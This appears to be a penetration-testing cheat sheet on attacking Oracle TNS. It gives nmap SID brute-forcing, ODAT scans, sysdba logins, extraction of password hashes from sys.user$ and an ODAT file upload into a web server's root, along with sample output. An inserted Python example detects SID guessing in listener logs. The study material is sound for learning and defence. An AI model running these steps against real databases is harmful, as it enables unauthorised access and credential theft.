Oracle TNS
The Oracle Transparent Network Substrate (TNS) server is a communication protocol that facilitates communication between Oracle databases and applications over networks. The default Oracle TNS port is TCP/1521, but it can easily be changed. The configuration files for Oracle TNS are called tnsnames.ora and listener.ora and are typically located in the ORACLE_HOME/network/admin directory. Each database or service has a unique entry in the tnsnames.ora file, containing the necessary information for clients to connect to the service.
In Oracle RDBMS, a System Identifier (SID) is a unique name that identifies a particular database instance. A database can have multiple instances, each with its own SID. An instance is a set of processes and memory structures that interact to manage the database's data. When a client connects to an Oracle database, it specifies the database's SID along with its connection string. The client uses this SID to identify which database instance it wants to connect to.
PLSQL Exclusion List
Oracle databases can be protected using a so-called PL/SQL Exclusion List (PlsqlExclusionList). It is a user-created text file that needs to be placed in the $ORACLE_HOME/sqldeveloper directory, and it contains the names of PL/SQL packages or types that should be excluded from execution.
ODAT
Oracle Database Attacking Tool (ODAT) is an open-source penetration testing tool written in Python and designed to enumerate and exploit vulnerabilities in Oracle databases. It can be used to identify and exploit various security flaws in Oracle databases, including SQL injection, remote code execution, and privilege escalation.
Tips2Hack
Nmap
sudo nmap -p1521 -sV 13.13.13.13 --open
Nmap - SID Bruteforcing
sudo nmap -p1521 -sV 13.13.13.13 --open --script oracle-sid-brute
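On the listener side, SID guessing of this kind shows up as one source address requesting many different SIDs that the listener rejects with TNS-12505. The following is an added example, not part of the original notes or of any Oracle tool: it assumes the text-format listener.log layout (timestamp, connect data, address, event, SID, return code separated by " * "), uses constructed sample lines, and its function names are hypothetical.

```python
import re
from collections import defaultdict

TNS_UNKNOWN_SID = 12505  # listener return code: SID not known to this listener


def _line(ts, sid, src, code):
    """Build one CONSTRUCTED log line in the assumed listener.log layout."""
    return (f"01-JAN-2024 {ts} * (CONNECT_DATA=(SID={sid})(CID=(PROGRAM=)"
            f"(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST={src})"
            f"(PORT=50000)) * establish * {sid} * {code}")


# Constructed sample data, not taken from a real system.
SAMPLE_LOG = "\n".join([
    _line("10:00:01", "XE", "10.0.0.20", 0),
    _line("10:00:09", "XEE", "10.0.0.20", 12505),   # single typo, not a sweep
    "TNS-12505: TNS:listener does not currently know of SID given in connect descriptor",
    _line("10:02:10", "ORCL", "10.0.0.99", 12505),
    _line("10:02:10", "PROD", "10.0.0.99", 12505),
    _line("10:02:11", "TEST", "10.0.0.99", 12505),
    _line("10:02:11", "DB11G", "10.0.0.99", 12505),
    _line("10:02:12", "XE", "10.0.0.99", 0),        # request that was accepted
])


def parse_establish(line):
    """Return (source_host, sid, return_code) or None for non-connect lines."""
    parts = line.strip().split(" * ")
    if len(parts) != 6 or parts[3] != "establish" or not parts[5].isdigit():
        return None
    sid = re.search(r"\(SID=([^)]*)\)", parts[1])
    src = re.search(r"\(HOST=([^)]+)\)", parts[2])  # network peer, not CID host
    if not (sid and src):
        return None
    return src.group(1), sid.group(1), int(parts[5])


def sid_guessing_sources(log_text, min_distinct=3):
    """Map each source to the distinct unknown SIDs it requested, if >= threshold."""
    rejected = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_establish(line)
        if rec and rec[2] == TNS_UNKNOWN_SID:
            rejected[rec[0]].add(rec[1])
    return {s: sorted(v) for s, v in rejected.items() if len(v) >= min_distinct}


if __name__ == "__main__":
    print(sid_guessing_sources(SAMPLE_LOG))
```

Counting distinct rejected SIDs per source, rather than raw failures, keeps a misconfigured application that retries one wrong SID from being reported as a sweep.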
ODAT
./odat.py all -s 13.13.13.13
SQLplus - Log In
sqlplus george/burger@13.13.13.13/XE
Oracle RDBMS - Interaction
SQL> select table_name from all_tables;
SQL> select * from user_role_privs;
USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
GEORGE                         CONNECT                        NO  YES NO
GEORGE                         RESOURCE                       NO  YES NO
Oracle RDBMS - Database Enumeration
sqlplus george/burger@13.13.13.13/XE as sysdba
SQL> select * from user_role_privs;
-------------------------------------------------------------------------
USERNAME                       GRANTED_ROLE                   ADM DEF OS
------------------------------ ------------------------------ --- --- ---
SYS                            ADM_PARALLEL_EXECUTE_TASK      YES YES NO
SYS                            APEX_ADMINISTRATOR_ROLE        YES YES NO
SYS                            AQ_ADMINISTRATOR_ROLE          YES YES NO
SYS                            AQ_USER_ROLE                   YES YES NO
SYS                            AUTHENTICATEDUSER              YES YES NO
SYS                            CONNECT                        YES YES NO
SYS                            CTXAPP                         YES YES NO
SYS                            DATAPUMP_EXP_FULL_DATABASE     YES YES NO
SYS                            DATAPUMP_IMP_FULL_DATABASE     YES YES NO
SYS                            DBA                            YES YES NO
SYS                            DBFS_ROLE                      YES YES
-------------------------------------------------------------------------
Oracle RDBMS - Extract Password Hashes
SQL> select name, password from sys.user$;
Oracle RDBMS - File Upload
./odat.py utlfile -s 13.13.13.13 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt
curl -X GET http://13.13.13.13/testing.txt
Hello There Adventurer!